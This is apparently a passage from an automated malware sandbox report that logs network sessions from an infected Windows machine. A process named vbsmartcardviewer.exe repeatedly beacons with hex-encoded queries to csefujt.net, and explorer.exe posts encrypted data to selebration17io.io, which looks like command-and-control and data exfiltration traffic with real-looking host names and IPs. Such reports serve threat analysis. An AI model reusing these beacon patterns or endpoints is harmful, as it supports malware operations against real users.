                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:13 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                73192.168.2.649815185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:13.926932096 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.168108940 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                74192.168.2.64981691.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.052932024 CET283OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://fejbifbnqes.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 351
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.052994967 CET351OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 fb e9 26 fc
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO&>;b<6>Ag5Ka5o4K;*mDd0!0s}:e}5rt|>fX{*,-]o#B9$UoG2"x%'pG
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.325778961 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                75192.168.2.649817185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.518063068 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.755007029 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:14.877481937 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:15.120498896 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                76192.168.2.649818185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:15.467427015 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:15.706836939 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:15.830215931 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.067214966 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.191704035 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.437174082 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                77192.168.2.649819185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:16.944181919 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:17.185250998 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                78192.168.2.649820185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:17.531131983 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:17.767784119 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                79192.168.2.649821185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.102613926 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.349021912 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                80192.168.2.64982291.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.544980049 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://ofbjqsuaveuwo.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 117
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.545032978 CET117OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 92 b1 30 b1
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO0"n$?ZA7cGC
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.802834034 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=[0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                81192.168.2.649823185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.744510889 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:18.983836889 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:19.111022949 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:19.358594894 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:19 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                82192.168.2.649824185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:19.696500063 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:19.932946920 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:19 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                83192.168.2.649825185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.273667097 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.516032934 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:20 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                84192.168.2.649826185.196.8.22804328C:\Users\user\AppData\Local\VB Smart Card Viewer\vbsmartcardviewer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:20.847456932 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.083873987 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:20 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: e67b680813008c20
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.205636978 CET326OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86e9968649895a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef929b38cc699711 HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:14:21.449549913 CET220INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:14:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
